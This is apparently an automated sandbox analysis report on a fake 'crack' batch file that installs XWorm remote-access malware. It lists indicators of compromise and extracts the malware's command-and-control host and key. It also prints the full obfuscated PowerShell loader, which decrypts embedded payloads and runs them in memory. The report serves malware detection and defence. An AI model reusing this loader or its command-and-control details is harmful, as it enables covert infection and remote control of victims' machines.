Analysis
-
max time kernel
149s -
max time network
50s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
27-04-2024 10:32
Static task
static1
General
-
Target
Orbit_Crack.bat
-
Size
259KB
-
MD5
1ccd59dd2bbf3dc838039654fed99860
-
SHA1
1d27c800b05db1f244afeaab7cd6f79549af0ff8
-
SHA256
d3dea32d8b022205401a7d5023c1fb63577021b8c38d1b8af43e166fbaa15b24
-
SHA512
58f44f000191551055f4d4fe001e4471ee2b8292cdecd14a6548d5917d78f886a92f4764ab9aea6273755c3da95d2bd0108350d3e11273f729759f140943fb4c
-
SSDEEP
6144:AE29oanve5LJRxPZ9Q9lgj3B8BlKcurMBZoE589vlwaSIS:AVI5dP89yjGlKcCcasd
Malware Config
Extracted
xworm
5.0
youth-oecd.gl.at.ply.gg:37887
irLH7SnIzjCRjwMK
-
Install_directory
%Userprofile%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/380-15-0x0000023941390000-0x000002394139E000-memory.dmp family_xworm -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSys32.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSys32.lnk powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exetaskmgr.exepid process 380 powershell.exe 380 powershell.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 2380 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exetaskmgr.exedescription pid process Token: SeDebugPrivilege 380 powershell.exe Token: SeDebugPrivilege 380 powershell.exe Token: SeDebugPrivilege 2380 taskmgr.exe Token: SeSystemProfilePrivilege 2380 taskmgr.exe Token: SeCreateGlobalPrivilege 2380 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
cmd.exedescription pid process target process PID 2896 wrote to memory of 380 2896 cmd.exe powershell.exe PID 2896 wrote to memory of 380 2896 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Orbit_Crack.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TCHWop+rKfjAUs8Gc6EIcZq3gKQUIuwod9lLSwDglHo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ANiW1ohpeww6mPCu5XWnXw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EobxR=New-Object System.IO.MemoryStream(,$param_var); $NLGjA=New-Object System.IO.MemoryStream; $XEFMi=New-Object System.IO.Compression.GZipStream($EobxR, [IO.Compression.CompressionMode]::Decompress); $XEFMi.CopyTo($NLGjA); $XEFMi.Dispose(); $EobxR.Dispose(); $NLGjA.Dispose(); $NLGjA.ToArray();}function execute_function($param_var,$param2_var){ $DLBIf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lObjd=$DLBIf.EntryPoint; $lObjd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Orbit_Crack.bat';$LWqwg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Orbit_Crack.bat').Split([Environment]::NewLine);foreach ($IVrtL in $LWqwg) { if ($IVrtL.StartsWith(':: ')) { $VyyZA=$IVrtL.Substring(3); break; }}$payloads_var=[string[]]$VyyZA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe"1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mnza3vxv.zk4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSys32.lnkFilesize
779B
MD5620d681b7ed901572838ed0085058c14
SHA18155ab8f1a73961dd283ec71c48bbc62614d2ce9
SHA2561b0d34376e277bfa4c820f2a8f19e72bdb5b387f54bf990e0393959b24ac16b3
SHA51248b2642853aba1585c612401247fd757e341846878805768af4acf848f39f12ae8f0fac3999e7c3add68d85723c28fc935f88c9bba1e9745e8f2c9581c89980b
-
C:\Users\Admin\WindowsSys32Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/380-9-0x0000023941300000-0x0000023941322000-memory.dmpFilesize
136KB
-
memory/380-10-0x00007FFF276D0000-0x00007FFF28191000-memory.dmpFilesize
10.8MB
-
memory/380-12-0x0000023941400000-0x0000023941410000-memory.dmpFilesize
64KB
-
memory/380-11-0x0000023941400000-0x0000023941410000-memory.dmpFilesize
64KB
-
memory/380-13-0x0000023941350000-0x0000023941358000-memory.dmpFilesize
32KB
-
memory/380-14-0x0000023941360000-0x0000023941392000-memory.dmpFilesize
200KB
-
memory/380-15-0x0000023941390000-0x000002394139E000-memory.dmpFilesize
56KB
-
memory/380-35-0x0000023941400000-0x0000023941410000-memory.dmpFilesize
64KB
-
memory/380-34-0x00007FFF276D0000-0x00007FFF28191000-memory.dmpFilesize
10.8MB
-
memory/2380-20-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB
-
memory/2380-26-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB
-
memory/2380-27-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB
-
memory/2380-31-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB
-
memory/2380-30-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB
-
memory/2380-29-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB
-
memory/2380-28-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB
-
memory/2380-25-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB
-
memory/2380-21-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB
-
memory/2380-19-0x0000028505150000-0x0000028505151000-memory.dmpFilesize
4KB